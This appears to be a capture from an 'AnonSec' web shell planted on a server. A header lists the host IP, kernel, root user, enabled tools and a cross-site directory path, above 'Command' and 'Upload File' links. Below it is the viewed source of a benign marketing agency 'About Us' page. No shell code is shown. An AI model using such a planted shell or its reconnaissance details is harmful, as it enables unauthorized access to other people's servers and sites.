|
Server IP : 149.13.87.7 / Your IP : 185.174.145.2 Web Server : nginx System : Linux h2 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : root ( 0) PHP Version : 8.0.28 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /mnt/platforms/workspaces/shortable.org/../avacedandexamprep.com/../applehollow.us/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>About Us - Applehollow</title>
<script src="https://cdn.tailwindcss.com"></script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.css" rel="stylesheet" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800;900&family=Plus+Jakarta+Sans:wght@300;400;500;600;700;800;900&display=swap" rel="stylesheet">
<style>
body {
font-family: 'Inter', sans-serif;
padding-top: 80px;
}
h1, h2, h3, h4, h5, h6 {
font-family: 'Plus Jakarta Sans', sans-serif;
}
@media (max-width: 768px) {
body {
padding-top: 72px;
}
}
</style>
<link rel="stylesheet" href="assets/css/dynamic.css">
</head>
<body class="antialiased">
<nav class="fixed w-full z-50 top-0 bg-gradient-to-r from-blue-600 to-green-600 text-white shadow-lg">
<div class="max-w-screen-xl flex flex-wrap items-center justify-between mx-auto p-4">
<a href="./" class="flex items-center space-x-3">
<div class="w-10 h-10 bg-white/20 backdrop-blur-sm rounded-lg flex items-center justify-center">
<svg width="48" height="48" viewBox="0 0 48 48" xmlns="http://www.w3.org/2000/svg">
<defs>
<linearGradient id="grad-630ac88d0d087df4a374688c8b3aa4ab" x1="0%" y1="0%" x2="100%" y2="0%">
<stop offset="0%" style="stop-color:#3b82f6;stop-opacity:1" />
<stop offset="100%" style="stop-color:#16a34a;stop-opacity:1" />
</linearGradient>
</defs>
<rect x="2" y="2" width="44" height="44" rx="24" fill="url(#grad-630ac88d0d087df4a374688c8b3aa4ab)" />
<text x="24" y="29" font-family="Arial, sans-serif" font-size="16" font-weight="bold" fill="white" text-anchor="middle" dominant-baseline="central">AP</text>
</svg> </div>
<span class="self-center text-2xl font-bold">
Applehollow </span>
</a>
<button data-collapse-toggle="navbar-default" type="button" class="inline-flex items-center p-2 w-10 h-10 justify-center text-sm text-white rounded-lg md:hidden hover:bg-white/20">
<svg class="w-5 h-5" fill="none" viewBox="0 0 17 14">
<path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M1 1h15M1 7h15M1 13h15"/>
</svg>
</button>
<div class="hidden w-full md:block md:w-auto" id="navbar-default">
<ul class="font-medium flex flex-col md:flex-row md:space-x-6">
<li><a href="#services" class="block py-2 px-3 text-white/90 hover:text-white transition-colors">Services</a></li>
<li><a href="#features" class="block py-2 px-3 text-white/90 hover:text-white transition-colors">Features</a></li>
<li><a href="#about" class="block py-2 px-3 text-white/90 hover:text-white transition-colors">About</a></li>
<li><a href="#testimonials" class="block py-2 px-3 text-white/90 hover:text-white transition-colors">Testimonials</a></li>
<li><a href="blog/" class="block py-2 px-3 text-white/90 hover:text-white transition-colors">Blog</a></li>
<li>
<a href="#contact" class="block py-2 px-6 text-blue-600 bg-white rounded-full hover:bg-gray-100 transition-all font-bold">
Contact
</a>
</li>
</ul>
</div>
</div>
</nav>
<section class="bg-white py-20" id="about">
<div class="max-w-screen-2xl mx-auto px-4">
<div class="text-center mb-16">
<h2 class="text-6xl font-black text-gray-900 mb-4">Elevate Your eCommerce Business with Our Comprehensive Solutions</h2>
<div class="w-32 h-2 bg-gradient-to-r from-blue-600 to-green-600 mx-auto mb-6"></div>
<p class="text-xl text-gray-600 max-w-3xl mx-auto">Our digital marketing agency specializes in helping eCommerce businesses grow their sales and revenue. Our expert solutions are designed to optimize your website, boost your online visibility, and attract more customers. With our proven track record of success, we can help you maximize your eCommerce sales and take your business to the next level.</p>
</div>
<div class="grid md:grid-cols-3 gap-8 mb-12">
<div class="md:col-span-2">
<div class="relative h-[600px] rounded-3xl overflow-hidden">
<img src="https://images.unsplash.com/photo-Q1p7bh3SHj8?w=1200&h=800&fit=crop&auto=format&q=80" alt="About" class="w-full h-full object-cover">
<div class="absolute bottom-0 left-0 right-0 bg-gradient-to-t from-black/80 to-transparent p-8">
<span class="inline-block px-4 py-2 bg-white/20 backdrop-blur-sm text-white rounded-full text-sm font-semibold mb-4">
Growth Catalysts </span>
<h3 class="text-3xl font-bold text-white">Committed to Excellence</h3>
</div>
</div>
</div>
<div class="space-y-6">
<div class="bg-gradient-to-br from-gray-50 to-white p-8 rounded-2xl border border-gray-200 hover:shadow-xl transition-all">
<div class="w-14 h-14 bg-gradient-to-br from-blue-600 to-green-600 rounded-xl flex items-center justify-center mb-4">
<i class="fas fa-trophy text-white text-xl"></i>
</div>
<h4 class="text-xl font-bold text-gray-900 mb-2">Award Winning</h4>
<p class="text-gray-600">Recognized globally</p>
</div>
<div class="bg-gradient-to-br from-gray-50 to-white p-8 rounded-2xl border border-gray-200 hover:shadow-xl transition-all">
<div class="w-14 h-14 bg-gradient-to-br from-blue-600 to-green-600 rounded-xl flex items-center justify-center mb-4">
<i class="fas fa-users-cog text-white text-xl"></i>
</div>
<h4 class="text-xl font-bold text-gray-900 mb-2">Expert Team</h4>
<p class="text-gray-600">50+ professionals</p>
</div>
<div class="bg-gradient-to-br from-gray-50 to-white p-8 rounded-2xl border border-gray-200 hover:shadow-xl transition-all">
<div class="w-14 h-14 bg-gradient-to-br from-blue-600 to-green-600 rounded-xl flex items-center justify-center mb-4">
<i class="fas fa-shield-check text-white text-xl"></i>
</div>
<h4 class="text-xl font-bold text-gray-900 mb-2">Certified</h4>
<p class="text-gray-600">ISO certified</p>
</div>
</div>
</div>
<div class="text-center">
<a href="#contact" class="inline-block px-12 py-6 bg-gray-900 text-white font-black text-lg rounded-full hover:bg-blue-600 transition-all">
Explore More </a>
</div>
</div>
</section>
<section class="bg-gradient-to-r from-blue-600 to-green-600 py-24" id="features">
<div class="max-w-screen-xl mx-auto px-4">
<div class="text-center mb-20">
<h2 class="text-5xl md:text-6xl font-black text-white mb-6">Why Choose Us</h2>
<p class="text-xl text-white/90 max-w-3xl mx-auto">Premium features for exceptional results</p>
</div>
<div class="grid md:grid-cols-2 lg:grid-cols-4 gap-8">
<div class="text-center p-8 bg-white rounded-3xl shadow-2xl">
<div class="w-16 h-16 bg-gradient-to-br from-blue-500 to-green-600 rounded-2xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-bolt text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Fast</h3>
<p class="text-gray-600">Lightning speed</p>
</div>
<div class="text-center p-8 bg-white rounded-3xl shadow-2xl">
<div class="w-16 h-16 bg-gradient-to-br from-blue-500 to-green-600 rounded-2xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-lock text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Secure</h3>
<p class="text-gray-600">Bank-level security</p>
</div>
<div class="text-center p-8 bg-white rounded-3xl shadow-2xl">
<div class="w-16 h-16 bg-gradient-to-br from-blue-500 to-green-600 rounded-2xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-mobile-alt text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Mobile</h3>
<p class="text-gray-600">All devices</p>
</div>
<div class="text-center p-8 bg-white rounded-3xl shadow-2xl">
<div class="w-16 h-16 bg-gradient-to-br from-blue-500 to-green-600 rounded-2xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-sync text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Updated</h3>
<p class="text-gray-600">Always current</p>
</div>
<div class="text-center p-8 bg-white rounded-3xl shadow-2xl">
<div class="w-16 h-16 bg-gradient-to-br from-blue-500 to-green-600 rounded-2xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-users text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Team</h3>
<p class="text-gray-600">Collaboration</p>
</div>
<div class="text-center p-8 bg-white rounded-3xl shadow-2xl">
<div class="w-16 h-16 bg-gradient-to-br from-blue-500 to-green-600 rounded-2xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-chart-bar text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Analytics</h3>
<p class="text-gray-600">Deep insights</p>
</div>
<div class="text-center p-8 bg-white rounded-3xl shadow-2xl">
<div class="w-16 h-16 bg-gradient-to-br from-blue-500 to-green-600 rounded-2xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-cloud text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Cloud</h3>
<p class="text-gray-600">Access anywhere</p>
</div>
<div class="text-center p-8 bg-white rounded-3xl shadow-2xl">
<div class="w-16 h-16 bg-gradient-to-br from-blue-500 to-green-600 rounded-2xl flex items-center justify-center mx-auto mb-6">
<i class="fas fa-cog text-white text-xl"></i>
</div>
<h3 class="text-xl font-bold text-gray-900 mb-3">Custom</h3>
<p class="text-gray-600">Tailored</p>
</div>
</div>
</div>
</section>
<section class="bg-gray-50 py-16">
<div class="max-w-screen-xl mx-auto px-4">
<div class="grid md:grid-cols-4 gap-1">
<div class="bg-white p-10 text-center hover:shadow-xl transition-all group">
<div class="text-5xl font-black text-rose-600 mb-3 group-hover:scale-110 transition-transform">
18K+ </div>
<div class="text-gray-600 font-bold uppercase text-sm tracking-wider">
Customers </div>
</div>
<div class="bg-white p-10 text-center hover:shadow-xl transition-all group">
<div class="text-5xl font-black text-blue-600 mb-3 group-hover:scale-110 transition-transform">
250+ </div>
<div class="text-gray-600 font-bold uppercase text-sm tracking-wider">
Partners </div>
</div>
<div class="bg-white p-10 text-center hover:shadow-xl transition-all group">
<div class="text-5xl font-black text-green-600 mb-3 group-hover:scale-110 transition-transform">
99.9% </div>
<div class="text-gray-600 font-bold uppercase text-sm tracking-wider">
Uptime </div>
</div>
<div class="bg-white p-10 text-center hover:shadow-xl transition-all group">
<div class="text-5xl font-black text-purple-600 mb-3 group-hover:scale-110 transition-transform">
24/7 </div>
<div class="text-gray-600 font-bold uppercase text-sm tracking-wider">
Support </div>
</div>
</div>
</div>
</section>
<footer class="bg-gradient-to-r from-gray-900 via-black to-gray-900 text-white">
<div class="max-w-screen-xl mx-auto px-6 py-16">
<div class="grid md:grid-cols-5 gap-10">
<div class="md:col-span-2 space-y-5">
<a href="./" class="inline-flex items-center space-x-3">
<div class="w-12 h-12 rounded-2xl bg-white text-gray-900 font-black text-xl flex items-center justify-center">
A </div>
<span class="text-3xl font-black tracking-tight">Applehollow</span>
</a>
<p class="text-white/60 max-w-md">Partnering with pioneers to build scalable marketing ecosystems that accelerate engagement and revenue.</p>
<div class="flex space-x-4 text-white/60 text-sm">
<span><i class="fas fa-phone text-emerald-400 mr-2"></i>+1-323-530-2148</span>
<span><i class="fas fa-envelope text-emerald-400 mr-2"></i>hello@applehollow.us</span>
</div>
</div>
<div>
<h3 class="text-sm font-bold uppercase tracking-[0.4em] text-white/50 mb-4">Navigation</h3>
<ul class="space-y-3 text-white/70">
<li><a href="#services" class="hover:text-white transition">Services</a></li>
<li><a href="#features" class="hover:text-white transition">Platform</a></li>
<li><a href="#about" class="hover:text-white transition">About</a></li>
<li><a href="blog/" class="hover:text-white transition">Blog</a></li>
<li><a href="#testimonials" class="hover:text-white transition">Proof</a></li>
</ul>
</div>
<div>
<h3 class="text-sm font-bold uppercase tracking-[0.4em] text-white/50 mb-4">Legal</h3>
<ul class="space-y-3 text-white/70">
<li><a href="./privacy.php" class="hover:text-white transition">Privacy</a></li>
<li><a href="./terms.php" class="hover:text-white transition">Terms</a></li>
<li><a href="./disclaimer.php" class="hover:text-white transition">Disclaimer</a></li>
</ul>
</div>
<div>
<h3 class="text-sm font-bold uppercase tracking-[0.4em] text-white/50 mb-4">Download</h3>
<a href="./contact.php" class="flex items-center justify-between px-5 py-4 rounded-xl bg-white/10 hover:bg-white/20 transition">
<div>
<div class="text-sm font-semibold">Latest Insights</div>
<div class="text-xs text-white/60">Annual trend report</div>
</div>
<i class="fas fa-download"></i>
</a>
</div>
</div>
<div class="border-t border-white/10 mt-12 pt-8 flex flex-col md:flex-row md:items-center md:justify-between text-sm text-white/50">
<span>© 2026 Applehollow. Engineered for growth.</span>
<div class="flex space-x-6 mt-4 md:mt-0">
<a href="#" class="hover:text-white transition">LinkedIn</a>
<a href="#" class="hover:text-white transition">Behance</a>
<a href="#" class="hover:text-white transition">GitHub</a>
</div>
</div>
</div>
</footer>
<script src="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.js"></script>
</body>
</html>
AnonSec - 2021